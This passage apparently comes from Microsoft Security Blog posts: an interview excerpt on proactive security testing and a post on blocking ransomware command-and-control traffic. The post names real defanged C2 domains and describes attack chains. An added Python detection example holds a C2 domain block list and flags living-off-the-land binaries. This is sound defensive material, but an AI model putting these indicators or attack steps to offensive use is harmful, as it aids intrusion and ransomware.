It’s important to get board buy-in and foster a culture of cybersecurity in the organization and make it something that everybody in the company talks about regularly, like with phishing awareness.

Another key thing is to never punish the user. If they are at work and opening emails, that is what you are asking that person to do. Even the best cybersecurity professionals will click on a phishing link eventually. It’s human nature. These psychological lures are designed to get people to click on them. One of the most effective is a fake FedEx or UPS notification. Nine times out of 10, people will click on the link to track that parcel because they want to know. The attackers know our psychology and our natural human behaviors and how to get attacks through our radar in a way that does not alert us that we are being attacked. Proper cybersecurity in an organization takes human error into account.

Brooke: How do you reduce assessment times and identify threats faster?

Matthew: The MITRE ATT&CK® Framework has been massively advantageous. It is a spreadsheet-based approach to understanding how an attacker behaves in an environment and it stems back to a paper written by Lockheed Martin. Lockheed Martin and the defense sector obviously were big targets for advanced persistent threats and cyber-enabled economic espionage, where nation-state actors break into their systems to steal information for espionage purposes.

Lockheed Martin came up with what they call the cyber kill chain, a timeline of an attack that starts at the very point that the attacker starts their breach into the network to the end—where they have exfiltrated and stolen the information. They modeled this and identified that the earlier you stop the attacker along this kill chain, the better, because they must start over again. The further along the chain they are, stopping the attack will cost the attacker more resources in terms of time and exploits used.

MITRE then came up with tools, techniques, and procedures. You can look at the threats in your industry and the known behaviors of threats targeting your sectors and begin unit testing those individual items. Instead of running a six-month engagement where we break into the client’s environment and do all this stealthy stuff, like monitor your network, we test against the actual threats and against these component items. That narrows the time involved in assessment activities and they get the result quicker.

Brooke: At what stage do clients bring your organization into the process?

Matthew: We work with a whole range of different clients, including people who have already built their product and people who have started to build their product. These kinds of strategies are usually very effective against large organizations—multinational corporations and Fortune 500 companies.

If you want to be effective in cybersecurity, the costs need to be on the attackers. We encourage organizations to move away from this longstanding engagement model and instead focus on doing unit tests against the actual situations they face. We call them cyber preparedness drills. We mimic the attacker’s behavior utilizing tools we’ve built, like these items we have published on GitHub for User Account Control (UAC) bypass testing:

These types of common attacker behaviors should be well-detected and even better detected by Microsoft Defender than they were previously. Simply scripting, even if it’s in the PowerShell command shell or the .NET developer platform and creating standard individual tests for specific items in the ATT&CK® framework and running those as simulations gives you better results.

Brooke: What advice would you give to cybersecurity leaders on how to manage their budgets?

Matthew: There is a big push in the industry to do what is most interesting. Clients will say, “I want you to simulate a real attacker. I want the best hackers to throw everything you have at the system.” They want to spend a ton of money simulating a real attacker and I usually discover they have not covered any of the basics, like telemetry, alerting, or network defense.

It is easy to bring people on board, but if you have not looked at your environment and the basics, there is no point hiring a team to mimic your attacker and do a full six-month red team engagement. Your attacker is going to break into your network for free anyway, so you might as well focus on how you can use that budget to build better defenses to alert your team. So many companies do not know how many systems or databases they have, for instance. They do not have an accurate picture of what is happening in their environment. They look to the penetration testers who end up telling them more than they know about their network. 

Leaders should always ask: Do you have an accurate picture of the patch levels in your environment? If someone opens malware, can you see the events? Do you get the telemetry?

You could buy the best security system around and if it is getting 150 alerts a day but nobody is paying attention, it is useless because no one is going to ever act. When looking at your budget and how to spend it effectively, focus on granular engagement. When you hire a firm, hire one that has a good background and good understanding that can make effective use of that budget.

There are three approaches. There is a black box assessment methodology, where we know nothing about the environment, the target, or the target network. Then, you have a gray box methodology, where a client might share a little bit of information, such as what is given to a new starting staff member in an area where there is a high employee turnover rate. And third, there is a white box assessment, where they give us anything we want to know and we can see what they see. From our experience, you get the best results from white box assessments and from doing bite-sized exercises as your security provider is better informed and not reliant on guesswork achieved through the other two common methodologies.

Learn more

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Identifying cyberthreats quickly with proactive security testing appeared first on Microsoft Security Blog.

Stopping C2 communications in human-operated ransomware through network protection

November 3rd, 2022 No comments

Command-and-control (C2) servers are an essential part of ransomware, commodity, and nation-state attacks. They are used to control infected devices and perform malicious activities like downloading and launching payloads, controlling botnets, or commanding post-exploitation penetration frameworks to breach an organization as part of a ransomware attack. Blocking these communications can mitigate attacks, sometimes before they’re even started.

For example, one of the most impactful cyberattack trends today is human-operated ransomware attacks, which succeed through a combination of components, including leveraging C2 infrastructure. To gain initial access, human-operated ransomware attacks are often delivered via spear-phishing with malicious attachments that, once launched by the target, typically reach out to a C2 server to download instructions and run payloads. These payloads persist on the device and periodically reach out to a (usually) separate set of C2s, awaiting instructions and takeover by a human operator as part of ransomware-as-a-service. After the hands-on-keyboard transition, remote C2s are commonly used to control post-exploitation frameworks to initiate reconnaissance, elevate privileges, and move laterally within the network to achieve data exfiltration and mass file encryption.

A human-operated ransomware attack example highlighting C2 usage. The attacker begins with the initial access stage, followed by execution, the initial C2 connection, persistence, a beaconing C2 connection, a post-exploitation C2 connection that continues throughout the attack, leading to lateral movement, and the final impact stage.
Figure 1. Example of C2 usage across the stages of a human-operated ransomware attack

Ransomware has evolved from a pre-programmed commodity threat to a complex threat that’s human-driven, adaptive, and focused on a larger scale. These days, ransomware attacks go beyond encryption and usually involve significant data theft as well to maximize the potential harm to the target, therefore increasing their chances of receiving a higher payout. Attackers engage in double extortion, demanding that victims pay the ransom or else have their stolen confidential information leaked while their encrypted data remains inaccessible. As such, successful ransomware attacks can have lasting, damaging impacts on targets.

As ransomware attacks continue to target various entities, including businesses, governments, critical infrastructure, educational institutions, and healthcare facilities, organizations must be prepared to defend networks against human-operated attacks and other sophisticated threats. Microsoft Defender for Endpoint’s updated network protection enables organizations to protect against these C2-based attacks by blocking any outbound traffic attempting to connect to malicious C2 servers, even if attackers manage to gain initial access to a device. Additionally, network protection is continuously informed by our integrated threat intelligence to identify active C2 infrastructure and uses machine learning models to quickly assess information on domains and IPs.

This blog details how the new C2 blocking capability in Microsoft Defender for Endpoint’s network protection works. We show examples of how network protection functions with other technologies in Microsoft Defender for Endpoint to deliver comprehensive protection against C2-based attacks. Lastly, we discuss how our threat research and use of advanced machine learning models inform network protection to intelligently block ransomware and C2-based attacks before widespread impact.

Network protection detecting C2 activity in various attacks

The following cases of human-operated ransomware attacks from our threat data and investigations show how the new C2 blocking capability in network protection stops attacks and, in some cases, could have prevented attacks much earlier.

Disrupting the ransomware attack chain

In early October 2022, we observed an attack leveraging the Raspberry Robin worm as the initial access vector. Upon launch by the user, the attack attempted to connect to the domain tddshht[.]com via HTTP using msiexec.exe to download a TrueBot payload. As part of these attacks, TrueBot is typically downloaded to a user’s local application data directory where Windows Management Instrumentation (WMI) is used to run the TrueBot DLL using rundll32. In this case, network protection was enabled in the environment and blocked the C2 communication from msiexec.exe to tddshht[.]com, which prevented TrueBot from being downloaded and launched, disrupting the attack.

In similar attacks on organizations originating from Raspberry Robin, we’ve seen TrueBot lead to Cobalt Strike for post-exploitation human-operated ransomware attacks. After launching TrueBot, we observed various follow-on actions, such as reconnaissance, persistence via scheduled tasks, and ransomware deployment.

Raspberry Robin malware launches the Windows Installer service, and msiexec.exe sends C2 communications over HTTP, which is blocked by network protection, preventing the attack from progressing. The attack was disrupted before the C2 connection to the domain tddshht[.]com, at which point TrueBot would have been downloaded and launched, followed by dropping a Cobalt Strike beacon that transitions to a hands-on-keyboard attack and a Cobalt Strike C2 connection, leading to follow-on activities and ransomware deployment.
Figure 2. Raspberry Robin incident disrupted by network protection

Stopping ransomware activity before it could wreak havoc

In another ransomware-related case from March 2022, Microsoft researchers discovered a LockBit ransomware attack that was successfully detected and blocked. LockBit is an encryptor payload leveraged by many different operators who specialize in the post-exploitation phase of the attack as part of ransomware as a service. In this case, there were multiple security products in different segments of the environment, and we didn’t have visibility of the initial access vector. As the attackers moved laterally within the network, we observed the operator using the Cobalt Strike framework for the post-exploitation stages of the attack, using Remote Desktop Protocol (RDP) with Rclone for data exfiltration, and LockBit at the final encryption stage. The encryption attempt followed the exfiltration stage by just two hours.

Throughout the attack, Microsoft Defender for Endpoint proactively displayed repeated alerts for the targeted customer that an active hands-on-keyboard attacker was active on their network, as well as repeated Cobalt Strike activity alerts and suspicious behaviors. Microsoft Defender Antivirus’s behavior detections repeatedly alerted and blocked Cobalt Strike in addition to fully blocking the attack’s LockBit encryptor payload, preventing impact on the subset of the network that had onboarded to Microsoft Defender for Endpoint.

Prior to this attack, network protection had already flagged the Cobalt Strike C2 domain sikescomposites[.]com as malicious. Had network protection C2 protection been enabled across the organization, then the Cobalt Strike C2 server would have been automatically blocked – further disrupting this attack earlier in the attack chain and potentially preventing or delaying the data exfiltration impact of the attack.

The network protection intelligence on the C2 was sourced two weeks before the attack in February 2022 through expert intelligence from Microsoft Threat Intelligence Center (MSTIC) and also incriminated via Cobalt Strike configuration extraction monitoring. Microsoft Defender for Endpoint could have disrupted this LockBit attack much earlier had network protection been enabled. Moreover, even if the attacker used a different or new payload, network protection would have blocked the attack if it used the same C2 infrastructure. The diagram below illustrates the timeline of events in this ransomware incident.

Two weeks before the attack, Microsoft's threat intelligence research sent intelligence on the C2 domain to network protection. Between Days 1 and 3, the attacker started hands-on-keyboard activity, repeated alerts displayed in Defender for Endpoint and the domain C2 connection was repeatedly observed and flagged by network protection. On Day 4, the attacker performed data exfiltration, Microsoft Defender Antivirus blocked the attacker's encryption payload, and the attacker successfully encrypted one device after restoring LockBit from quarantine.
Figure 3. LockBit ransomware incident timeline

End-to-end protection against C2-based attacks

The range of protection capabilities in Microsoft Defender for Endpoint ensures our customers are provided with synchronous protection, integrated remediation, and actionable alerts against these C2-based attacks. The combination of technologies and features within Defender for Endpoint assures customers that their assets are adequately protected.

Network protection blocks any outbound traffic when an application attempts to connect to known malicious C2 and informs customers of the block.

The Microsoft 365 Defender portal's alerts page displaying two examples of blocked C2 activity via network protection.
Figure 4. Example of blocked C2 activity in the Microsoft 365 Defender portal

Network protection then sends this intelligence to Microsoft Defender Antivirus, which remediates the process against known malware that attempted the C2 connection. Customers are then notified of these actions on the Defender for Endpoint portal, where they can see the attack chain, follow remediation steps, or do further investigation.
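As an added example (not Microsoft's code and not how network protection is actually implemented), the block, remediate and alert flow just described, run over constructed endpoint network telemetry in the style of the Raspberry Robin case above. The two C2 domains are the ones this post names; the device names, process names, hostnames, reputation notes and LOLBin list are constructed placeholders.

```python
"""Toy model of reputation-based C2 blocking: look up the destination,
block (or audit) the connection, hand the initiating process to AV for
remediation, and raise an alert. Added example, not product code."""
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Reputation data, written defanged as the post writes it. The notes are
# constructed placeholders for where the intelligence came from.
C2_REPUTATION_DEFANGED: Dict[str, str] = {
    "tddshht[.]com": "TrueBot download stage (Raspberry Robin case)",
    "sikescomposites[.]com": "Cobalt Strike C2 (LockBit case)",
}

# Constructed list of living-off-the-land binaries that rarely have a
# legitimate reason to fetch content over plain HTTP (msiexec in the post).
HTTP_LOLBINS = {"msiexec.exe", "rundll32.exe", "regsvr32.exe", "mshta.exe"}


def refang(indicator: str) -> str:
    """Turn a defanged indicator (example[.]com, hxxp://) into matchable form."""
    return indicator.lower().replace("[.]", ".").replace("hxxp", "http")


@dataclass
class NetEvent:
    device: str
    process: str            # initiating process image name
    remote_host: str        # destination hostname
    protocol: str           # "http", "https", ...
    enforcement: bool = True  # block mode (True) or audit mode (False)


@dataclass
class Verdict:
    action: str                       # "blocked", "audited" or "allowed"
    reason: Optional[str] = None
    remediate_process: Optional[str] = None  # what AV is told to clean up
    alerts: List[str] = field(default_factory=list)


class NetworkProtection:
    def __init__(self, defanged_reputation: Dict[str, str]) -> None:
        # Normalise once so lookups are exact matches on real hostnames.
        self.reputation = {refang(k): v for k, v in defanged_reputation.items()}

    def _lookup(self, host: str) -> Optional[str]:
        """Match the host or any parent domain (cdn.evil.com -> evil.com)."""
        labels = host.lower().rstrip(".").split(".")
        for i in range(len(labels) - 1):
            hit = self.reputation.get(".".join(labels[i:]))
            if hit is not None:
                return hit
        return None

    def evaluate(self, ev: NetEvent) -> Verdict:
        reason = self._lookup(ev.remote_host)
        if reason is None:
            v = Verdict(action="allowed")
            # Not a block: a hunting lead for a LOLBin speaking plain HTTP.
            if ev.process.lower() in HTTP_LOLBINS and ev.protocol == "http":
                v.alerts.append(f"suspicious: {ev.process} HTTP to {ev.remote_host}")
            return v
        action = "blocked" if ev.enforcement else "audited"
        v = Verdict(action=action, reason=reason, remediate_process=ev.process)
        v.alerts.append(f"{action}: {ev.process} on {ev.device} -> {ev.remote_host} ({reason})")
        return v


# Constructed telemetry: the two incidents from the post plus benign noise.
SAMPLE_EVENTS = [
    NetEvent("ws01", "msiexec.exe", "tddshht.com", "http"),
    NetEvent("ws02", "svchost.exe", "cdn.sikescomposites.com", "https", enforcement=False),
    NetEvent("ws03", "rundll32.exe", "updates.example.net", "http"),
    NetEvent("ws04", "chrome.exe", "www.example.org", "https"),
]


def summarize(events: List[NetEvent]) -> Tuple[Dict[str, int], List[str]]:
    """Run every event through network protection; return counts and alerts."""
    npx = NetworkProtection(C2_REPUTATION_DEFANGED)
    counts = {"blocked": 0, "audited": 0, "allowed": 0}
    alerts: List[str] = []
    for ev in events:
        v = npx.evaluate(ev)
        counts[v.action] += 1
        alerts.extend(v.alerts)
    return counts, alerts


if __name__ == "__main__":
    totals, lines = summarize(SAMPLE_EVENTS)
    print(totals)
    print("\n".join(lines))
```

The audited event shows why the LockBit case above mattered: with enforcement off, the connection to the known C2 is only logged, not stopped.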

Diagram displaying how network protection blocks C2 connections using reputation lookup, sending connection metadata to signature matching to remediate the process via Microsoft Defender Antivirus, ultimately allowing Microsoft Defender for Endpoint to generate alerts using its detection logic.
Figure 5. Alerts for investigation in the Microsoft Defender for Endpoint portal are generated through a combination of technologies to protect against C2-based attacks

Network protection uses a dynamic reputation database that stores information on IPs, domains, and URLs gathered from a wide range of sources including threat research, detonation, adversary tracking, memory scanning, and active C2 web scanning. These activities lead to identifying C2 servers operated by human-operated ransomware actors and botnet actors and discovering compromised IPs and domains associated with known nation-state actors.

Network protection is aided by machine learning models that incriminate IP addresses used for C2 by inspecting network traffic telemetry. These models are trained on an extensive data set and use a diverse feature set, including DNS records, prevalence, location, and associations with compromised files or domains. Our threat experts’ knowledge further helps refine these models, which are re-trained and redeployed daily to adapt to the ever-changing threat landscape.

Training data, including good and malicious C2 IP addresses, is used to train machine learning models in addition to using extracted feature sets to predict new C2 IPs. This information is sent to Microsoft Defender for Endpoint to block malicious connections, perform remediation, and generate alerts.
Figure 6. Machine learning pipeline to generate new intelligence to protect customers from C2-based attacks

Preventing C2-based attacks

Attackers often rely heavily on leveraging C2 communications to start and progress attacks, including human-operated ransomware attacks. C2 infrastructure enables attackers to control infected devices, perform malicious activities, and quickly adapt to their target environment in the pursuit of organizations’ valuable data and assets.

Breaking this link to C2 infrastructure disrupts an attack, either by stopping it completely or by delaying its progression, allowing more time for the SOC to investigate and mitigate the intrusion. Microsoft Defender for Endpoint’s network protection capability identifies and blocks connections to C2 infrastructure used in human-operated ransomware attacks, leveraging techniques like machine learning and intelligent indicators of compromise (IOC) identification.

Microsoft customers can use the new C2 blocking capability to prevent malicious C2 IP and domain access by enabling network protection. Network protection examines network metadata, matches it to threat-related patterns, and determines the true nature of C2 connections. Enhanced by continuously fine-tuned machine learning models and constant threat intelligence updates, Microsoft Defender for Endpoint can take appropriate actions to block malicious C2 connections and stop malware from launching or propagating. Customers can also refer to our Tech community blog post for guidance on validating functionality and more information on C2 detection and remediation.

In addition to enabling network protection C2 blocking, it’s recommended to follow the general best practices to defend your network against human-operated ransomware attacks.

The post Stopping C2 communications in human-operated ransomware through network protection appeared first on Microsoft Security Blog.